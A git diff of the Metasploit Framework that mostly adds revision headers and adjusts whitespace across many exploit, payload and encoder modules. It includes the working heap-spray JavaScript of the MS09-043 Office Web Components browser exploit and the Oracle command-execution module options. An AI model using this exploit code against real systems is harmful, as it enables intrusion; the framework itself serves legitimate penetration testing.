--- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb
+++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -15,10 +19,9 @@ class Metasploit3 < Msf::Auxiliary
 super(update_info(info,
 'Name' => ' DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution',
 'Description' => %q{
- This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
+ This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
 any user with create session privilege to grant themselves java IO privileges.
 Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only)
-
 },
 'Author' => [ 'sid[at]notsosecure.com' ],
 'License' => MSF_LICENSE,
@@ -30,10 +33,10 @@ class Metasploit3 < Msf::Auxiliary
 ],
 'DisclosureDate' => 'Feb 1 2010'))
- register_options(
- [
- OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
- ], self.class)
+ register_options(
+ [
+ OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
+ ], self.class)
 end
 def run
diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb
index 7515161aab..154038f4c5 100644
--- a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb
+++ b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -16,9 +20,8 @@ class Metasploit3 < Msf::Auxiliary
 'Name' => ' DBMS_JVM_EXP_PERMS 11g R1/R2 OS Code Execution',
 'Description' => %q{
 This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
- any user with create session privilege to grant themselves java IO privileges.
+ any user with create session privilege to grant themselves java IO privileges.
 Identified by David Litchfield. Works on 11g R1 and R2 (Windows only).
-
 },
 'Author' => [ 'sid[at]notsosecure.com' ],
 'License' => MSF_LICENSE,
@@ -30,10 +33,10 @@ class Metasploit3 < Msf::Auxiliary
 ],
 'DisclosureDate' => 'Feb 1 2010'))
- register_options(
- [
- OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
- ], self.class)
+ register_options(
+ [
+ OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
+ ], self.class)
 end
 def run
diff --git a/modules/encoders/x86/alpha_mixed.rb b/modules/encoders/x86/alpha_mixed.rb
index 98bc10df53..54627b0795 100644
--- a/modules/encoders/x86/alpha_mixed.rb
+++ b/modules/encoders/x86/alpha_mixed.rb
@@ -9,13 +9,10 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
 require 'rex/encoder/alpha2/alpha_mixed'
-
 class Metasploit3 < Msf::Encoder::Alphanum
-
 Rank = LowRanking
 def initialize
@@ -64,7 +61,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
 buf + Rex::Encoder::Alpha2::AlphaMixed::gen_decoder(reg, off)
 end
-
+
 #
 # Configure SEH getpc code on Windows
 #
@@ -73,7 +70,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
 datastore['AllowWin32SEH'] = true
 end
 end
-
+
 #
 # Encodes a one byte block with the current index of the length of the
 # payload.
@@ -89,4 +86,3 @@ class Metasploit3 < Msf::Encoder::Alphanum
 state.encoded += Rex::Encoder::Alpha2::AlphaMixed::add_terminator()
 end
 end
-
diff --git a/modules/exploits/multi/fileformat/maple_maplet.rb b/modules/exploits/multi/fileformat/maple_maplet.rb
index 38053c0858..915a389028 100644
--- a/modules/exploits/multi/fileformat/maple_maplet.rb
+++ b/modules/exploits/multi/fileformat/maple_maplet.rb
@@ -23,11 +23,11 @@ class Metasploit3 < Msf::Exploit::Remote
 This module harnesses Maple's ability to create files and execute commands automatically when opening a Maplet. All versions up to 13 are suspected vulnerable. Testing was conducted with version 13 on Windows. Standard security
- settings prevent code from running in a normal maple worksheet without user
+ settings prevent code from running in a normal maple worksheet without user
 interaction, but those setting do not prevent code in a Maplet from running. In order for the payload to be executed, an attacker must convince someone to
- open a specially modified .maplet file with Maple. By doing so, an attacker can
+ open a specially modified .maplet file with Maple. By doing so, an attacker can
 execute arbitrary code as the victim user. },
 'License' => MSF_LICENSE,
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
 fname << ".exe"
 end
 fhandle = rand_text_alpha(3+rand(15))
-
+
 #Write maple commands to create executable
 content = fhandle + " := fopen(\"#{fname}\",WRITE,BINARY);\n"
 exe = binary.unpack('C*')
diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
index 47abb407de..2860734d81 100644
--- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
+++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
@@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
 specifiers, an attacker can corrupt memory and execute arbitrary code.
 },
 'Author' => [ 'jduck' ],
+ 'Version' => '$Revision$',
 'References' =>
 [
 ['OSVDB', '11805'],
diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb
index 35513fea08..91dab8d1e7 100644
--- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb
+++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb
@@ -1,5 +1,5 @@
 ##
-# $Id: wireshark_lwres_getaddrbyname.rb 8364 2010-02-03 18:24:42Z jduck $
+# $Id$
 ##
 ##
@@ -9,7 +9,6 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
 #require 'racket'
@@ -48,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'redsand' # windows target/testing
 ],
 'License' => MSF_LICENSE,
- 'Version' => '$Revision: 8364 $',
+ 'Version' => '$Revision$',
 'References' =>
 [
 [ 'CVE', '2010-0304' ],
diff --git a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb
index 6175d79191..427e3701c8 100644
--- a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb
+++ b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb
@@ -19,6 +19,9 @@ class Metasploit3 < Msf::Exploit::Remote
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow',
+ # Description?
+ # Author?
+ 'Version' => '$Revision$',
 'Platform' => 'osx',
 'References' =>
 [
diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
index 6ca9c96d60..b797cedafd 100644
--- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
+++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
@@ -1,7 +1,16 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking
diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb
index cbced37023..1597900b0e 100644
--- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb
+++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb
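Review bot: The `# Description?` and `# Author?` comments added inside the update_info hash of quicktime_rtsp_content_type.rb record that the module still ships without a Description or Author entry, but a bare question mark buried between hash keys is easy to overlook and leaves the metadata gap invisible to anyone reading the module info. One marker in the usual annotation form would be more visible, e.g. `# TODO: add 'Description' and 'Author' entries; the module currently registers neither`. The enclosing `initialize` body continues outside the hunk.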
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'PayloadType' => 'cmd',
 'RequiredCmd' => 'generic perl ruby bash telnet',
 }
- },
+ },
 'Platform' => [ 'unix', 'win', 'linux' ],
 'Arch' => ARCH_CMD,
 'Targets' => [[ 'Automatic', { }]],
@@ -81,6 +81,6 @@ class Metasploit3 < Msf::Exploit::Remote
 req2 = send_request_raw({
 'uri' => datastore['URIOUT'],
 }, 25)
-
+
 end
 end
diff --git a/modules/exploits/windows/backdoor/energizer_duo_payload.rb b/modules/exploits/windows/backdoor/energizer_duo_payload.rb
index 2d6d037209..6a8bba8838 100644
--- a/modules/exploits/windows/backdoor/energizer_duo_payload.rb
+++ b/modules/exploits/windows/backdoor/energizer_duo_payload.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking
@@ -18,10 +20,10 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Energizer DUO Trojan Code Execution',
 'Description' => %q{
- This module will execute an arbitrary payload against
- any system infected with the Arugizer trojan horse. This
- backdoor was shipped with the software package accompanying
- the Energizer Duo USB battery charger.
+ This module will execute an arbitrary payload against
+ any system infected with the Arugizer trojan horse. This
+ backdoor was shipped with the software package accompanying
+ the Energizer Duo USB battery charger.
 },
 'Author' => [ 'hdm' ],
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb
index 65c8d5467f..cfa09c63e8 100644
--- a/modules/exploits/windows/browser/adobe_jbig2decode.rb
+++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb
@@ -1,9 +1,13 @@
-###
-## This file is part of the Metasploit Framework and may be subject to
-## redistribution and commercial restrictions. Please see the Metasploit
-## Framework web site for more information on licensing and terms of use.
-## http://metasploit.com/framework/
-###
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
 require 'msf/core'
 require 'zlib'
@@ -18,17 +22,17 @@ class Metasploit3 < Msf::Exploit::Remote
 'Name' => 'Adobe JBIG2Decode Memory Corruption Exploit',
 'Description' => %q{
 This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
- This module relies upon javascript for the heap spray.
+ This module relies upon javascript for the heap spray.
 },
 'License' => MSF_LICENSE,
 'Author' =>
 [
- # Metasploit implementation
- 'natron',
- # bl4cksecurity blog explanation of vuln [see References]
- 'xort', 'redsand',
- # obfuscation techniques and pdf template from util_printf
- 'MC', 'Didier Stevens ',
+ # Metasploit implementation
+ 'natron',
+ # bl4cksecurity blog explanation of vuln [see References]
+ 'xort', 'redsand',
+ # obfuscation techniques and pdf template from util_printf
+ 'MC', 'Didier Stevens ',
 ],
 'Version' => '$Revision$',
 'References' =>
@@ -54,7 +58,6 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'DisclosureDate' => 'Feb 2009',
 'DefaultTarget' => 0))
-
 end
 def autofilter
diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb
index 05b2262a75..de38792b1f 100644
--- a/modules/exploits/windows/browser/adobe_utilprintf.rb
+++ b/modules/exploits/windows/browser/adobe_utilprintf.rb
@@ -1,9 +1,13 @@
-###
-## This file is part of the Metasploit Framework and may be subject to
-## redistribution and commercial restrictions. Please see the Metasploit
-## Framework web site for more information on licensing and terms of use.
-## http://metasploit.com/framework/
-###
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
 require 'msf/core'
 require 'zlib'
@@ -18,8 +22,8 @@ class Metasploit3 < Msf::Exploit::Remote
 'Name' => 'Adobe util.printf() Buffer Overflow',
 'Description' => %q{
 This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional
- < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()
- entry, an attacker may be able to execute arbitrary code.
+ < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()
+ entry, an attacker may be able to execute arbitrary code.
 },
 'License' => MSF_LICENSE,
 'Author' => [ 'MC', 'Didier Stevens ' ],
diff --git a/modules/exploits/windows/browser/ms09_043_owc_msdso.r b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb
index fc8e5f24d6..f4f3855039 100644
--- a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb
+++ b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [ 'MSB', 'MS09-043' ],
 [ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ],
 [ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ],
- ],
+ ],
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'process',
@@ -43,17 +43,17 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 1024, - 'BadChars' => '', + 'BadChars' => '', 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] + [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Jul 13 2009', 'DefaultTarget' => 0)) - + @javascript_encode_key = rand_text_alpha(rand(10) + 10) end @@ -68,45 +68,45 @@ class Metasploit3 < Msf::Exploit::Remote return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") - - + + shellcode = Rex::Text.to_unescape(p.encoded) retaddr = Rex::Text.to_unescape([target.ret].pack('V')) - + js = %Q| - + var xshellcode = unescape("#{shellcode}"); - + var xarray = new Array(); var xls = 0x81000-(xshellcode.length*2); var xbigblock = unescape("#{retaddr}"); - + while( xbigblock.length < xls / 2) { xbigblock += xbigblock; } var xlh = xbigblock.substring(0, xls / 2); delete xbigblock; - + for(xi=0; xi<0x99*2; xi++) { xarray[xi] = xlh + xlh + xshellcode; } - + CollectGarbage(); - + var xobj = new ActiveXObject("OWC10.Spreadsheet"); - + xe = new Array(); xe.push(1); xe.push(2); xe.push(0); xe.push(window); - + for(xi=0; xi < xe.length; xi++){ for(xj=0; xj<10; xj++){ try { xobj.Evaluate(xe[xi]); } catch(e) { } } } - + window.status = xe[3] + ''; - + for(xj=0; xj<10; xj++){ try{ xobj.msDataSourceObject(xe[3]); } catch(e) { } } @@ -118,14 +118,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj} } ).to_s - - + + # Encode the javascript payload with the URI key # js = encrypt_js(js, @javascript_encode_key) - + # Fire off the page to the client send_response(cli, "") - + # Handle the payload handler(cli) end 
diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index 09b6038ebf..0a42afa2d9 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -1,5 +1,5 @@ ## -# $id$ +# $Id$ ## ## diff --git a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb index f85d9751ba..bce0fa72a2 100644 --- a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb +++ b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' require 'zlib' diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb index e791d04250..073a1dacfa 100644 --- a/modules/exploits/windows/fileformat/mediajukebox.rb +++ b/modules/exploits/windows/fileformat/mediajukebox.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit 
@@ -17,9 +21,9 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)', 'Description' => %q{ - This module exploits a stack overflow in Media Jukebox 8.0.400 - By creating a specially crafted m3u or pls file, an an attacker may be able - to execute arbitrary code. + This module exploits a stack overflow in Media Jukebox 8.0.400 + By creating a specially crafted m3u or pls file, an an attacker may be able + to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => @@ -70,4 +74,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/fileformat/mymp3player_m3u.rb b/modules/exploits/windows/fileformat/mymp3player_m3u.rb index f1da192b16..2516bc9231 100644 --- a/modules/exploits/windows/fileformat/mymp3player_m3u.rb +++ b/modules/exploits/windows/fileformat/mymp3player_m3u.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - + # direct ret overwrite at offset 1024 # nseh overwrite at offset 1040 ret_offset = 1024 @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote | stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub).encode_string m3u[seh_offset - stub.length, stub.length] = stub - + # Jump back to the stub jmp2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + stub.length.to_s).encode_string seh = '' diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index 6e2a52d497..0dbc140666 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -52,6 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' # metasploit module ], + 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '62163' ], diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index 7e5b58dbbb..7cb468bee1 100644 
--- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -26,6 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote long JSESSION cookie value can lead to arbirtary code execution. }, 'Author' => 'pusscat', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5457' ], diff --git a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb index 56ad5f02f4..4d6157c931 100644 --- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb +++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb @@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote You may have to run this twice due to timing issues with handlers. }, 'Author' => 'pusscat', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4008' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb index c755d445db..07393d9f69 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4178' ], diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index 55ae5a380b..0fc6e42007 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb @@ -45,6 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Trancer ', # Metasploit implementation 'jduck' ], + 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.pank4j.com/exploits/httpdxb0f.php' ], 
diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index cd702c6ec3..e14ea87364 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' # original discovery and metasploit module ], + 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '60182' ] diff --git a/modules/payloads/singles/linux/x86/chmod.rb b/modules/payloads/singles/linux/x86/chmod.rb index 2eeffbb179..1a077a4dbc 100644 --- a/modules/payloads/singles/linux/x86/chmod.rb +++ b/modules/payloads/singles/linux/x86/chmod.rb @@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' ### # Linux Chmod(file, mode) diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb index 248496e351..7e3a2fe8dd 100644 --- a/modules/payloads/singles/linux/x86/exec.rb +++ b/modules/payloads/singles/linux/x86/exec.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - ### # # Exec diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index c49e9883c8..e4b5dabd80 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -9,11 +9,9 @@ # http://metasploit.com/framework/ ## - require 'msf/core' require 'msf/core/payload/windows/exec' - ### # # Executes a command on the target machine diff --git a/modules/payloads/stagers/osx/x86/bind_tcp.rb b/modules/payloads/stagers/osx/x86/bind_tcp.rb index 2190055d81..b38ee4c6ef 100644 --- a/modules/payloads/stagers/osx/x86/bind_tcp.rb 
+++ b/modules/payloads/stagers/osx/x86/bind_tcp.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' require 'msf/core/handler/bind_tcp' diff --git a/modules/payloads/stages/netware/shell.rb b/modules/payloads/stages/netware/shell.rb index e6d8ac10d3..2079d18db9 100644 --- a/modules/payloads/stages/netware/shell.rb +++ b/modules/payloads/stages/netware/shell.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb index c0b8587903..47daaaf731 100644 --- a/modules/payloads/stages/osx/x86/bundleinject.rb +++ b/modules/payloads/stages/osx/x86/bundleinject.rb @@ -9,11 +9,9 @@ # http://metasploit.com/framework/ ## - require 'msf/core' require 'msf/core/payload/osx/bundleinject' - ### # # Injects an arbitrary DLL in the exploited process. diff --git a/modules/payloads/stages/windows/dllinject.rb b/modules/payloads/stages/windows/dllinject.rb index 41d5f6179e..6a3b68cfcd 100644 --- a/modules/payloads/stages/windows/dllinject.rb +++ b/modules/payloads/stages/windows/dllinject.rb 
@@ -1,9 +1,19 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + # Copyright (c) 2008 Stephen Fewer of Harmony Security (www.harmonysecurity.com) require 'msf/core' require 'msf/core/payload/windows/reflectivedllinject' - ### # # Injects an arbitrary DLL in the exploited process via a reflective loader. @@ -14,4 +24,3 @@ module Metasploit3 include Msf::Payload::Windows::ReflectiveDllInject end - diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb index 0c5f7ba401..fea3e648a1 100644 --- a/modules/payloads/stages/windows/patchupdllinject.rb +++ b/modules/payloads/stages/windows/patchupdllinject.rb @@ -9,11 +9,9 @@ # http://metasploit.com/framework/ ## - require 'msf/core' require 'msf/core/payload/windows/dllinject' - ### # # Injects an arbitrary DLL in the exploited process. @@ -23,4 +21,4 @@ module Metasploit3 include Msf::Payload::Windows::DllInject -end \ No newline at end of file +end diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb index 4d8f1b0584..bea6a25930 100644 --- a/modules/payloads/stages/windows/vncinject.rb +++ b/modules/payloads/stages/windows/vncinject.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + # Copyright (c) 2008 Stephen Fewer of Harmony Security (www.harmonysecurity.com) require 'msf/core' diff --git a/modules/payloads/stages/windows/x64/vncinject.rb b/modules/payloads/stages/windows/x64/vncinject.rb index 0be1215b9a..6cdfdae213 100644 
--- a/modules/payloads/stages/windows/x64/vncinject.rb +++ b/modules/payloads/stages/windows/x64/vncinject.rb @@ -21,7 +21,7 @@ require 'msf/base/sessions/vncinject' module Metasploit3 include Msf::Payload::Windows::ReflectiveDllInject_x64 - + def initialize(info = {}) super(update_info(info, 'Name' => 'Windows x64 VNC Server (Reflective Injection)', @@ -29,7 +29,7 @@ module Metasploit3 'Description' => 'Inject a VNC Dll via a reflective loader (Windows x64) (staged)', 'Author' => [ 'sf' ], 'Session' => Msf::Sessions::VncInject )) - + # Override the DLL path with the path to the meterpreter server DLL register_options( @@ -85,9 +85,9 @@ module Metasploit3 flags = 0 flags |= 1 if (datastore['DisableCourtesyShell']) - + flags |= 2 if (datastore['DisableSessionTracking']) - + # Transmit the one byte flag session.rstream.put([ flags ].pack('C')) @@ -104,7 +104,7 @@ module Metasploit3 print_status("Launched vnciewer in the background.") end end - + super end diff --git a/msfcli b/msfcli index 694dd15c61..340004565b 100755 --- a/msfcli +++ b/msfcli @@ -1,9 +1,13 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface allows users to interact with the framework through a # command line interface (CLI) rather than having to use a prompting console # or web-based interface. # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) @@ -17,7 +21,7 @@ require 'rex' require 'msf/ui' require 'msf/base' -Indent = ' ' +Indent = ' ' if(RUBY_PLATFORM =~ /mswin32/) $stderr.puts "[*] The msfcli interface is not supported on the native Windows Ruby\n" @@ -73,7 +77,7 @@ end if (not exploit_name) ext = '' - + tbl = Rex::Ui::Text::Table.new( 'Header' => 'Exploits', 'Indent' => 4, @@ -83,7 +87,7 @@ if (not exploit_name) tbl << [ 'exploit/' + name, mod.new.name ] } ext << tbl.to_s + "\n" - + tbl = Rex::Ui::Text::Table.new( 'Header' => 'Auxiliary', 'Indent' => 4, 
@@ -92,9 +96,9 @@ if (not exploit_name) $framework.auxiliary.each_module { |name, mod| tbl << [ 'auxiliary/' + name, mod.new.name ] } - + ext << tbl.to_s + "\n" - + usage(nil, ext) end @@ -107,7 +111,7 @@ case exploit_name when /exploit\/(.*)/ exploit = $framework.exploits.create($1) module_class = 'exploit' - + when /auxiliary\/(.*)/ exploit = $framework.auxiliary.create($1) module_class = 'auxiliary' @@ -129,10 +133,10 @@ if (exploit == nil) end exploit.init_ui( - Rex::Ui::Text::Input::Stdio.new, + Rex::Ui::Text::Input::Stdio.new, Rex::Ui::Text::Output::Stdio.new ) - + # Evalulate the command (default to "help") mode = ARGV.pop || 'h' 
@@ -174,22 +178,22 @@ case mode.downcase $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_module(payload, Indent)) if payload $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_module(encoder, Indent)) if encoder $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_module(nop, Indent)) if nop - + when "o" $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_options(exploit, Indent)) $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_options(payload, Indent)) if payload $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_options(encoder, Indent)) if encoder - $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_options(nop, Indent)) if nop + $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_options(nop, Indent)) if nop when "a" $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_advanced_options(exploit, Indent)) $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_advanced_options(payload, Indent)) if payload $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_advanced_options(encoder, Indent)) if encoder - 